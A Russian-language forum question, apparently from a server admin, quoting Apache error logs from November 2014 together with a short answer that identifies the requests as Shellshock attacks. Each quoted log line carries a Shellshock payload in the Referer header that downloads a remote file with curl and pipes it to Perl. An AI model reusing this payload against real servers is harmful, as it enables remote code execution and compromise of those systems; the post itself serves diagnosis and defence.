Я обнаружил некоторые странные HTTP-запросы в своих журналах apache, но я не уверен, должны ли они меня беспокоить или нет?
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bizdb1-search.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bigconf.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bbs_forum.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/BBS, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
Любые идеи?
Это ShellShock, атака / эксплойт уязвимости bash. Более подробная информация и как проверить, уязвимы ли вы, представлены, например, здесь: http://dshield.org/diary.html?date=2014-09-25.